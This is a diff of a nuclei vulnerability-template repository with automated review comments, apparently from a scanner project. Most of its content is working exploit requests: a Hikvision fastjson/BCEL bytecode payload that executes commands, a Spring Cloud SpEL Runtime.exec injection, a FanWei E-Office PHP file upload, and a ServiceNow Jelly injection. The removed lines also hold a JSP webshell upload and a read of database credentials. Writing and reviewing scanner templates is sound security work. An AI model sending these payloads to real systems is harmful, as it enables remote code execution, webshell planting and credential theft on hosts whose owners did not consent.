@@ -1,50 +1,27 @@ id: HIKVISION info: - name: HHIKVISION iVMS-8700 upload Webshell file - author: zerZero Trust Security Attack and Defense Laboratory + name: HIKVISION + author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - HHIKVISION iVMS-8700 Comprehensive Security Management Platfor upload Webshell file + There is a command execution vulnerability in Hikvision's comprehensive security system. Hackers can execute system commands through the vulnerability metadata: - fofa-query: icon_hash="-911494769" - hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" + fofa-query: app="HIKVISION-综合安防管理平台" + hunter-query: web.title="综合安防管理平台" -variables: - str0: '{{BaseURL}}/eps/api/resourceOperations/uploadsecretKeyIbuilding' - http: - raw: - | - POST /eps/api/resourceOperations/upload?token={{toupper(md5(str0))}} HTTP/1.1 + POST /bic/ssoService/v1/applyCT HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Android 3.2.5; Mobile; rv:51.0) Gecko/51.0 Firefox/51.0 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: close - Content-Length: 184 - Content-Type: multipart/form-data; boundary=c4155aff43901a8b2a19a4641a5efa15 - - --c4155aff43901a8b2a19a4641a5efa15 - Content-Disposition: form-data; name="fileUploader"; filename="test.jsp" - Content-Type: image/jpeg - - {{randstr}} - --c4155aff43901a8b2a19a4641a5efa15-- - - - | - GET /eps/upload/{{name}}.jsp HTTP/1.1 - Host: {{Hostname}} - - extractors: - - type: json - name: name - json: - - ".data.resourceUuid" - internal: true + Content-Type: application/json + Testcmd: whoami + + {"CTGT": {"a": {"@type": "java.lang.Class", "val": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"}, "b": {"@type": "java.lang.Class", "val": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "c": {"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource", "driverClassLoader": {"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "driverClassName": 
"$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$a5Wyx$Ug$Z$ff$cd$5e3$3b$99$90dCB$W$uG$N$b09v$b7$a1$95B$c2$99$90$40J$S$u$hK$97P$db$c9$ec$q$3bd3$Tfg$J$a0$b6$k$d4$D$8fZ$8f$daPO$b4$ae$b7P$eb$s$U9$eaA$b1Z$8fzT$ad$d6zk$f1$f6$8f$da$f6$B$7c$bf$99$N$d9$84$ad$3c$3e$sy$be$f9$be$f7$7b$ef$f7$f7$be3y$fc$e2$p$a7$A$dc$80$7f$89$Q1$m$60P$84$PI$b6h$Cv$f3$Y$e2$91$f2$a3$E$c3$8c$a4$f30x$8c$88t$de$p$c2D$9a$JY$C2$ecr$_$8fQ$B$fb$E$ec$e7q$80$R$5e$c3$e3$b5$ec$f9$3a$R$d5$b8S$c4$5dx$3d$5b$de$m$e2$8dx$T$5b$O$K$b8$5bD7$de$cc$e3$z$ec$fcV$Bo$T$d1$84C$C$de$$$e0$j$3c$de$v$e0$5d$C$ee$R$f0n$k$f7$Kx$P$8f$f7$96$a0$B$efc$cb$fb$F$dc$t$e0$D$C$ee$e71$s$e00$T$bc$93$z$P$I$f8$a0$80$P$J$f8$b0$80$8f$88$f8$u$3e$c6$a8G$E$7c$5c$c0$t$E$3c$u$e0$93$C$b2$3c$3e$c5$e3$d3$o6$e03l$f9$ac$88$cf$e1$f3$o$d6$e3$L$C$be$c8$9eG$d9r$8c$89$3e$c4$7c$fc$S$d3$f4$b0$88$_$p$c7c$9c$83o$b5$a6k$d6Z$O$eeP$dd$z$i$3cmFB$e5P$d6$a5$e9jOf$b8_5$7b$e5$fe$UQ$fc$a3$a6f$a9$adFb$3f$879$a1$ae$dd$f2$5e9$9a$92$f5$c1$e8$d6$fe$dd$aab$b5$f4$b52$f1$d2$98$r$xC$dd$f2$88$zE$89$a4$U$da$b9$k$e2$m$b6$efS$d4$RK3$f44$H$ef$a0ju$90$c0$ca$o$aa$K$u1$cb$d4$f4$c1$96$ba$x$99xLPY8$I$ab$95$94$j$B$8f$e3$94$40$ca$_$r$97$c7$pd$_fdLE$ed$d0$98$fbe$bd$c6$b0$o$5b$edJ$d2$880$5d$Sz$b0$95C$ada$OF$e4$RYI$aa$R$cb$e6$88d$y$z$V$e9$cf$MDZ$f7$5bj$5b2$a3$PI8$81$afH8$89Sd$$$adZ$ec$82B$u$9b$f2$a9$z$r$a7$89$e2$eak$95p$gg$q$3c$8a$afr$u$9f$e94$87$8a$vR$a7n$a9$83$aa$c9$i$f9$g$8f$afK$f8$G$ceJx$M$e78$f0$Jc$H$cb$b6$84o2$3d$8bf$Y$ea1$ac$O$p$a3$t$$$e7$93C$rc$89$e8$9aa$7b$dd$9a$Z$YPM$w$e6$a8$v$8fpX8$r$dfc$c42J$b2$5b$b5$92$c6$94$b8$84$c7$f1$z$O$Lf$b2uhj$aa$90$eb$db8$c7$bc$7d$82R$_$e1$3b$f8$ae$84$ef$e1$fb$94v$JO$e2$H$S$7e$88$l$91$ebV$d2T$e5DZ$c2N$f4$91_$7d$F$95$eb$b5$afZ$q$fc$YO$91s$ea$3eU$91$f0$T$fc$94$f6I$cb$oG$7d$96l$S$$8$E$a6$84$b6gt$ddA$a0$cfJj$e9$da$eb$c8FR$d6$T$v$W$a0o0e$f4$cb$a9$7c$fc$8e$40AV$c4$R$d3P$d4t$da0$a98$b3l$WV$ddh$97$96$b6$q$fc$MO$b3$I$7eN$d07$d5$3d$iJ$c8$f4v5$3dB$f8dx$a7$d3fr$97$99$v$9f$JH$c2A$af$9a$b6TB$93$84_$e0$Zb$t$5c$Q$f6$ad$MY$f2$cb$89$c4$a4$u$cf$f8$94$e1$E$ed$8ctD$97$87$a9$v$7e$v$e1Y$fcJ$c2$afY$g$7
c$a3$9a$9e0F$e9$9e$b8$o$94$T$82QT$a1c$b4_$d3$a3$e9$q$j$c3$ca$qpl$efc$8a$ac$ebLw$cd$94$5b$db$9c$40$5b3Z$w$e1$60$ea7$S$7e$8b$df$f1$f8$bd$84$3f$e0$8f$8c$f2$tR$b5k$83$84$e7p$5e$c2$9f$f1$94$84$bf$e0$af$S$b6$p$s$e1o$f8$3b$8f$7fH$f8$tsi$9eb$MG$H$e4$b4$b5$3bm$e8$d1$bd$99Tt$aay$a8$f9$a7$ac$9a$ea$40$8a$60$j$b5$812$zMN$a9g$d4$3f$df$cc$U$db$80a$f6P$w8$y$J$fd$f7f$b7$f1N$S$r$ba$3a$da$a9$a7$zYWHjv$a8$c8$40$m$U$f5$c6$b7$b5S$aa$8a$c8WP57$aaJJ6$d5$84$83$7e$O$eb$8b$d8$ee$bbB$b6$d0$d2d$bc$8e$Gf1$d4$c9$a6$5e$cd$cb$b1Py5$7d$af1D$3e$af$w63$af$q$V$NL$m$ef$f3$p$a62T$y$3d$M$ac$93$W$cb$LB$cd$X$s$7c$95$yO$ab$p$a9$x$r$V$b1$cc$88j$w$8e$d1$aab$f2l$da$T$e87$u$Mx$9a$dd$a1$9e$d0NFv$db$3d$bc$b4H$c0E$a3$xU2$a6$a9$ea$d6$qf$a6W7$3f4$a8$7fI$abs$d8d$g$Z$9a$W$c1$o$7c$f6$VC$Y1$3b$I$9b$ae$ed2$E$F$c5$d0$zYc$af$a2y$85$8e$b6$re3$a6$ee$c9$a8$E$b4$96$ba$9d$USZ$3b$a0$dao$c7N$96$88$ce$a2$n$f0Z$ba$7dx$c4$dao$f3$ed$9c$3e0$f6$d3$9c$Yv$a6$Lu$v$r$95$b1$z$bdJE$$$fbYb$Z$5d$c6$a8j$b6$c9l$uU$87$8a$f4$TK$b9$97Z$c3$b4$98$83$85Z$f2S$a1e$da$7b$tOt$S$da$a9$8fdhnQ$ea$86$d9k$3d$_$ac$Z$d1$82$L$S$af$J$V$bd$60$96$a5LZ$dd$a8$a6$b4az_$d1LZ$f6$f2$81$V$O$_$d6$3b$ba$ba$cfr$b0$9d$7f$a1zBu$7d$ad$O$fa$f2$99$d2$Y$b9$sT$a8$60$ea$86t$cc$$F$t$9d$96$e1$98$c6b$fa$e2$R$c1$7e$3c$e0$d8$x$9f$d6mt$ba$86$9e$i$3d$bd$f5$e3$e0$8e$d1$86$c3$cd$b4$fa$i$o$89$d0T$84$8b$b1r$a3$f4$91$e8$r$ea$8b$B$d7$E$dc$3d$e1$i$3c$dd$e1$80$d7w$S$be$b8$3b$c0$c7$e2$9e$87$m$c4$e2$5e$b6$e6$e0o$f4$9e$84$Yw7$Q$dd$d9$9d$40I$dc$3d$O$89$Il$dbp$8a$ed$89$b3tG$7d$O$b3$Ce$k$5bQ$98$u$e5$f5$k$5b$a2$d1$be$cd$e2P$b3$t$Q$b0m$G$w$3d$93$e6$c8D$d8$937Al$ddWS$d2$fe$ff$x9F$99$A$M$faN$ae$b0$9f$e3$98M$U$96$af$b5$u$a3$b5$83$f2$b6$89$b2$b4$99h$9dt$bf$9d8o$82$85$z8$80$$$dcG$rx$98h$e3$94$fe$e3T$80$d3$94$d5$a7$89$f3$F$f4$d2$_0$H$ee$e7a$f2x$d5$f3$d8$c8$e3$96$L$d8$c0c$H$8f$5b$R$cfW$ad$8e$caA$l$TN9$f0$A$dcv9Vr$b6$d7$U$96$f8$m$aa$c3$N9TugQ$da$ec$a1$C$cd$e9$c9$5ez$ae$f11H$tP$jo$YG$cd$e9FO$O$c1F$S$98$7b$944$96$a2$92$be$e4$ab$f3A$y$87D$eb$O$3a$dd$K$9e$y$95b$X$dd$dfF$f7$afF$Nn$t$ac$dc$81EPP$8b$E$c2$Y$m$feA$db$f1$Kx$
$$80$e7$b1$8b$9c$ed$e1q$9b_$wpY$m$e1$3c$d8$dc$s$9dJ$A$d7$cd$ee$96$J$cc$cba$7e$e0$9a$J$y8$83$85$f4$d7$e5$5e3$bf$e1$d4$R$d7$f5$N$f3$97$f7$84$cf$ba$96$90$fb$8b$9a$3dAO$60q$O$d7$kvU$d1$ee$V$b4$hs$95$84$D$b5$q$d6$ec$Nz$l$c5$921$ee$a5$a07$b0$94$I$81el$J$d9WY$I$cd$be$y$f7$y$5d$d5$db$s$g$9a$7d$ee$V$7c$V$l$f4$jG$p$87$p$dc$a9$a0$af$8a$3f$8e$b0$L$cdBP$ID$f2$gY$fd$a3n$aa$3f$d5$3e$e8$a5$8dH$85o$f6$3b$X$d7$e5q$d3$U$b3o$3dyX7$c5$D$cb$c7q$3d$83$c8$Z41$9f$cfb$uH$89$be$e10$94$a0$9fI$be$d2$91tZ$a3$3c$e8$f7$5c$ee$88$K$9cc$7d$c0$e0$e5$b0$ae$f0N$g$89$7b$f2$96$fc$de$Z$96$e2d$c3$W$f1$b4$5c$cd$b3$hgz6$96$f7$ec$de$ff$c1$b3$c0$ca$J$ac$ca$a19$d0$c2$w$80$m$f5$7c$TY$5b$cd$5c$5cC$zO$dedQ$9d$a7$aee$d4u$O$b5Y$M$faO$60$7d$fc$E6$c4$83$e28Zsh$cba$e38$da$D$j9l$caas$O$9d$T$b8$89$e2$m$d7Jl$d7$c6P5w$M$VA$ff$E$b6$e4$d0$e50$Q$c5$97$85$ff$m$cfe$_$ae$9e$3c$b8$b8$ec$85$t$b2$f0la$8d$d9$D$99pYG$f0$earm$a5$a7$83$e9$p$I$d1$w$d0$c9O$cdZ$82$f9$84$f1E$84$ecZ$ccB$3d5$edZ$94S$dbV$90t$r$c9W$93$86$d9$84$ec$wh$84$f8$M$e6$e2$m$e6$e1$k$92$ba$9f$d0$7f$M$L$f0$M$W$e2$3c$Wq$d5X$ccu$e2Zn$L$96p$fb$b0$94$bb$h$cb$b8$a3$Iq$e7Q$e7$aa$40$bd$ab$92$90U$8b$88k9$9a$5c$x$b0$dc$b5$Ks$5d$eb$b0$c2$d5$86$h$5d$j$uqua$jy$b9$c6$b5$8d$feU$ed$b5$bb$ae$fc$o$aa9$k$L$b9K4$t$7c$f6$8e$c7$ed$3c$ee$a0$v$A$da$ca$d4d$b3x$f4s$X$f0$a4$3d$Yv$bc$84C$dby$uuR$c5$L$f0$bd$I$ef$r$g$3fn$5b$Q$f87$bc$ad$q$c3$e6y$82$d4$bb$a0$fe$H$d8$3e$ebc$Z$Q$A$A"}}} matchers: - type: word words: - - '{{randstr}}' + - "nt authority\\system" diff --git a/poc/remote_code_execution/spring-functions-rce.yaml b/poc/remote_code_execution/spring-functions-rce.yaml index 39a36176e1..f28360d6a7 100644 --- a/poc/remote_code_execution/spring-functions-rce.yaml +++ b/poc/remote_code_execution/spring-functions-rce.yaml 
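Review bot: The single matcher `- "nt authority\\system"` only fires when the target is Windows and the service runs as SYSTEM; a Linux host, or a Windows service under a lower-privileged account, would execute `whoami` just the same and report nothing, so the template under-reports. If the loaded class echoes the `Testcmd` output into the response — the class is an opaque BCEL blob here, so that is inferred — an account-independent marker such as `Testcmd: echo {{randstr}}` matched with `- '{{randstr}}'` would be more robust, assuming the gadget hands the header to a shell. This request loads attacker-supplied bytecode through a fastjson → `BasicDataSource` → BCEL `ClassLoader` chain and runs a command, which is an exploit rather than a probe; `info` should say so, and `name: HIKVISION` / `id: HIKVISION` should name the endpoint (`/bic/ssoService/v1/applyCT`) so the template is distinguishable from other Hikvision checks.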
@@ -1,56 +1,44 @@ id: CVE-2022-22963 info: - name: Spring Cloud - Remote Code Execution - author: Mr-xn,Adam Crosser + name: CVE-2022-22963 - Spring Cloud RCE + author: rdnt severity: critical - description: | - Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions are susceptible to remote code execution vulnerabilities. When using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. - remediation: | - Apply the latest security patches provided by the Spring Cloud project to mitigate this vulnerability. - reference: - - https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f - - https://github.com/cckuailong/spring-cloud-function-SpEL-RCE - - https://tanzu.vmware.com/security/cve-2022-22963 - - https://nsfocusglobal.com/spring-cloud-function-spel-expression-injection-vulnerability-alert/ - - https://github.com/vulhub/vulhub/tree/scf-spel/spring/spring-cloud-function-spel-injection - - https://nvd.nist.gov/vuln/detail/CVE-2022-22963 + description: RCE on Spring cloud function SPEL + tags: cve,rce,spring,cve2022,injection classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-22963 - cwe-id: CWE-94,CWE-917 - epss-score: 0.97537 - epss-percentile: 0.99993 - cpe: cpe:2.3:a:vmware:spring_cloud_function:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: vmware - product: spring_cloud_function - tags: cve,cve2022,vulhub,springcloud,rce,kev,vmware + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-22963 + cwe-id: CWE-770 -http: - - raw: - - | - POST /functionRouter HTTP/1.1 - Host: {{Hostname}} - spring.cloud.function.routing-expression: 
T(java.net.InetAddress).getByName("{{interactsh-url}}") - Content-Type: application/x-www-form-urlencoded - - {{rand_base(8)}} +requests: + - method: POST + path: + - "{{RootURL}}/functionRouter" + - "{{RootURL}}/api/functionRouter" + - "{{RootURL}}/api/v1/functionRouter" + - "{{RootURL}}/../../../../../../functionRouter" + - "{{RootURL}}/../../../../../../;functionRouter" + - "{{RootURL}}/spring/functionRouter" + - "{{RootURL}}/admin/functionRouter" + - "{{RootURL}}/../../../../../../../../functionRouter" + - "{{RootURL}}../../../../../../../../api/functionRouter" + - "{{RootURL}}../../../../../../../../api/v1/functionRouter" + - "{{RootURL}}%2f%2e%2e%2f%2e%2e%2ffunctionRouter" + - "{{RootURL}}%2fspring%2ffunctionRouter" + - "{{RootURL}}%2fadmin%2functionRouter" + headers: + spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("") + Content-Type: application/x-www-form-urlencoded + body: exp matchers-condition: and matchers: - - type: word - part: interactsh_protocol - words: - - "http" - - "dns" - condition: or - - - type: status - status: - - 500 -# digest: 490a0046304402205d6843e61f79f6f923c45f295fdbd23eb8553580f133f3595140c997e398c304022032df92fd24048679c909836db50aeef2682dfff4b5c6e8a8e844e32c0a7de57e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - type: word + part: body + words: + - 'functionRouter' + - type: status + status: + - 500 \ No newline at end of file diff --git a/poc/sql/CVE-2024-7618-520e6bf48c0bcb2d0d283fdbdb93284a.yaml b/poc/sql/CVE-2024-7618-520e6bf48c0bcb2d0d283fdbdb93284a.yaml new file mode 100644 index 0000000000..c030b8c755 --- /dev/null +++ b/poc/sql/CVE-2024-7618-520e6bf48c0bcb2d0d283fdbdb93284a.yaml 
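Review bot: The new matcher — status 500 plus the body containing `functionRouter` — is met by any Spring Boot error page for that path, most likely including patched versions that reject the routing expression, so this rewrite trades the removed template's interactsh confirmation for a check that cannot separate vulnerable from not vulnerable; on a vulnerable host `exec("")` itself throws `IllegalArgumentException: Empty command`, which is also just a 500. Keep the original `T(java.net.InetAddress).getByName("{{interactsh-url}}")` header with the `interactsh_protocol` matcher, or at least require a marker that only SpEL evaluation can produce. The path list has a typo (`%2fadmin%2functionRouter` decodes to `/admin/unctionRouter`), the `..` traversal variants are unlikely to reach a Spring handler, and `requests:` is the deprecated key for `http:`. The rewrite also drops the references, KEV tag, EPSS/CPE metadata and changes `cwe-id` from CWE-94/CWE-917 to CWE-770 (resource exhaustion), which does not describe SpEL injection.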
@@ -0,0 +1,59 @@ +id: CVE-2024-7618-520e6bf48c0bcb2d0d283fdbdb93284a + +info: + name: > + Community by PeepSo – Social Network, Membership, Registration, User Profiles <= 6.4.5.0 - Authenticated (Administrator+) Stored Cross-Site Scripting via content Parameter + author: topscoder + severity: low + description: > + The Community by PeepSo – Social Network, Membership, Registration, User Profiles plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘content’ parameter in all versions up to, and including, 6.4.5.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/edf2e060-5ae4-4b46-bc68-22ae5f516fe8?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-7618 + metadata: + fofa-query: "wp-content/plugins/peepso-core/" + google-query: inurl:"/wp-content/plugins/peepso-core/" + shodan-query: 'vuln:CVE-2024-7618' + tags: cve,wordpress,wp-plugin,peepso-core,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/peepso-core/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "peepso-core" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.4.5.0') \ No newline at end of file 
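Review bot: The description carries the precondition that this only affects multisite installs or sites with `unfiltered_html` disabled, but the template flags every install ≤ 6.4.5.0, so expect findings on single-site installs where administrators can already post unfiltered HTML. Add a comment near `compare_versions`, e.g. `# readme version check only; precondition (multisite / unfiltered_html disabled) is not verified`. The file sits under `poc/sql/` although it is a stored XSS, and the two extractors (`internal: true` plus an exported one with the same regex) could be collapsed into a single non-internal extractor.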
diff --git a/poc/sql/CVE-2024-8369-371892027f1c271d3247dba36b384fb8.yaml b/poc/sql/CVE-2024-8369-371892027f1c271d3247dba36b384fb8.yaml
new file mode 100644
index 0000000000..60b20be14f
--- /dev/null
+++ b/poc/sql/CVE-2024-8369-371892027f1c271d3247dba36b384fb8.yaml
@@ -0,0 +1,59 @@ +id: CVE-2024-8369-371892027f1c271d3247dba36b384fb8 + +info: + name: > + EventPrime <= 4.0.4.3 - Missing Authorization to Unauthenticated Private or Password-Protected Events Disclosure + author: topscoder + severity: high + description: > + The EventPrime – Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to unauthorized access to Private or Password-protected events due to missing authorization checks in all versions up to, and including, 4.0.4.3. This makes it possible for unauthenticated attackers to view private or password-protected events. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/97174ec0-a2b7-455e-9bf8-b6f51546beee?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-8369 + metadata: + fofa-query: "wp-content/plugins/eventprime-event-calendar-management/" + google-query: inurl:"/wp-content/plugins/eventprime-event-calendar-management/" + shodan-query: 'vuln:CVE-2024-8369' + tags: cve,wordpress,wp-plugin,eventprime-event-calendar-management,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/eventprime-event-calendar-management/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "eventprime-event-calendar-management" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.0.4.3') \ No newline at end of file diff --git a/poc/sql/ecology-oa-HrmCareerApplyPerView-sqli.yaml b/poc/sql/ecology-oa-HrmCareerApplyPerView-sqli.yaml index 4e7ede529c..8c93d2bd55 100644 
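Review bot: `severity: high` (and the `high` tag) disagrees with the `cvss-score: 5.3` / `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N` vector two lines above, which maps to medium; one of them is wrong, and nuclei severity filters will put the template in the wrong bucket. Align them (`severity: medium` and `tags: …,medium`) or note why the higher rating was chosen. This file also duplicates the blank-metadata `poc/other/eventprime-event-calendar-management-601952a417648d8bd01a7751add339d9.yaml` added in the same commit, and lives under `poc/sql/` although the issue is a missing authorization check.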
--- a/poc/sql/ecology-oa-HrmCareerApplyPerView-sqli.yaml +++ b/poc/sql/ecology-oa-HrmCareerApplyPerView-sqli.yaml @@ -1,29 +1,39 @@ id: FanWei - info: - name: FanWei HrmCareerApplyPerView SQL Injection Vulnerability + name: FanWei Micro OA E-Office Uploadify Arbitrary File Upload Vulnerability author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - FanWei There is a HrmCareerApplyPerView SQL injection vulnerability that hackers can use to obtain sensitive information- + The pan micro OA E-Office uploads files in uploadify.php without strict filtering, which allows unrestricted file uploading. Attackers can directly obtain website permissions through this vulnerability metadata: - fofa-query: app="泛微-协同办公OA" - hunter-query: web.title="泛微-协同办公OA" - + fofa-query: app="泛微-EOffice" + hunter-query: web.title="泛微软件" http: - raw: - | - GET /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%271%27)),db_name(1),5,6,7 HTTP/1.1 + POST /inc/jquery/uploadify/uploadify.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko) - Accept-Encoding: gzip, deflate + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 Connection: close + Content-Length: 259 + Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4 + Accept-Encoding: gzip + + --e64bdf16c554bbc109cecef6451c26a4 + Content-Disposition: form-data; name="Filedata"; filename="test.php" + Content-Type: image/jpeg + + + + --e64bdf16c554bbc109cecef6451c26a4-- req-condition: true matchers: - type: dsl dsl: - - 'contains(body_1, "c4ca")' + - 'status_code_1 == 200 && len(body) > 0' condition: and + +# /attachment/3466744850/xxx.php 
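Review bot: The matcher `status_code_1 == 200 && len(body) > 0` is satisfied by any 200 response with a body — a login page, a soft-404, a WAF block page — so the template will report every E-Office host (and many hosts that are not E-Office) as having an unrestricted upload without confirming the file landed. Match on what `uploadify.php` returns for a successful upload instead; the trailing comment `# /attachment/3466744850/xxx.php` suggests the response echoes the stored path, so something like `contains(body_1, "/attachment/")` (to be confirmed against a real response) or a second request fetching that path is needed. The multipart body declares `Content-Length: 259` but the file part is empty, so the header will not match what is sent unless nuclei recomputes it. The file is still named `ecology-oa-HrmCareerApplyPerView-sqli.yaml` and keeps `id: FanWei`, yet now holds an E-Office upload PoC that writes `test.php` to the target — an intrusive action that deserves a comment in `info`.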
diff --git a/poc/sql/file-manager-5afc1d5d5506db51958aa1cb25998e9c.yaml b/poc/sql/file-manager-5afc1d5d5506db51958aa1cb25998e9c.yaml new file mode 100644 index 0000000000..3904cf9d45 --- /dev/null +++ b/poc/sql/file-manager-5afc1d5d5506db51958aa1cb25998e9c.yaml @@ -0,0 +1,59 @@ +id: file-manager-5afc1d5d5506db51958aa1cb25998e9c + +info: + name: > + Bit File Manager – 100% Free & Open Source File Manager and Code Editor for WordPress <= 6.5.5 - Authenticated (Subscriber+) Arbitrary File Upload + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9cae7702-e531-45b9-9131-42edbc073a07?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/file-manager/" + google-query: inurl:"/wp-content/plugins/file-manager/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,file-manager,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/file-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "file-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.5.5') \ No newline at end of file diff --git a/poc/sql/servicenow-db-exploit.yaml b/poc/sql/servicenow-db-exploit.yaml index 88273ac876..1af8e26f56 100644 --- a/poc/sql/servicenow-db-exploit.yaml +++ b/poc/sql/servicenow-db-exploit.yaml 
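Review bot: `severity: low` for "Authenticated (Subscriber+) Arbitrary File Upload" is hard to reconcile with the title — a subscriber-level upload of arbitrary files in a file-manager plugin is usually a code-execution primitive — and the blank `cvss-score`/`cve-id` give no basis for the rating. Fill the classification from the Wordfence entry in `reference` or drop the `cve` tag. The template sits under `poc/sql/` although nothing in it is SQL-related, and, like its siblings, it only reads `Stable tag` from readme.txt; a `# version-based detection only` comment above `http` would say so.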
@@ -5,24 +5,23 @@ info: author: Brut Security severity: Critical description: | - This template detects Jelly Scripting Injection vulnerabilities by injecting a payload and checking for a db exploitation result in the response. + This template detects Jelly Scripting Injection vulnerabilities by injecting a payload and checking for a specific multiplication result in the response. reference: - https://www.assetnote.io/resources/research/chaining-three-bugs-to-access-all-your-servicenow-data http: - raw: - | - GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly:core%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Ez=new%20Packages.java.io.File(%22%22).getAbsolutePath();z=z.substring(0,z.lastIndexOf(%22/%22));u=new%20SecurelyAccess(z.concat(%22/co..nf/glide.db.properties%22)).getBufferedReader();s=%22%22;while((q=u.readLine())!==null)s=s.concat(q,%22%5Cn%22);gs.addErrorMessage(s);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E%22 HTTP/1.1 + GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Egs.addErrorMessage(668.5*2);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E HTTP/1.1 Host: {{Hostname}} + Connection: close matchers-condition: and matchers: - type: word words: - - "glide.db.properties" - - "glide.db.name" - - "glide.db.rdbms" - - "glide.db.url" - - "glide.db.user" - - "glide.db.password" + - "1337" part: body + - type: status + status: + - 200 \ No newline at end of file diff --git a/poc/sql_injection/ecology-oa-HrmCareerApplyPerView-sqli.yaml b/poc/sql_injection/ecology-oa-HrmCareerApplyPerView-sqli.yaml index 4e7ede529c..8c93d2bd55 100644 --- a/poc/sql_injection/ecology-oa-HrmCareerApplyPerView-sqli.yaml +++ b/poc/sql_injection/ecology-oa-HrmCareerApplyPerView-sqli.yaml 
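Review bot: The matcher is a bare `"1337"` in the body, so any login page that happens to contain those four digits (a build number, a bundle hash) is reported as Jelly injection; the check is sound only as long as nothing else on the page says 1337. A randomized operand removes the collision: declare `variables: { a: "{{rand_int(100000, 999999)}}" }`, send `gs.addErrorMessage({{a}}*3);` and match with `- type: dsl` / `dsl: - 'contains(body, to_string({{a}}*3))'` (verify how the DSL renders the product; it may format it as a float). Replacing the `glide.db.properties` read with an evaluation proof is a welcome de-escalation from credential exfiltration, but the filename `servicenow-db-exploit.yaml` and the `info.name` above this hunk still describe the old behavior and should be updated with it.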
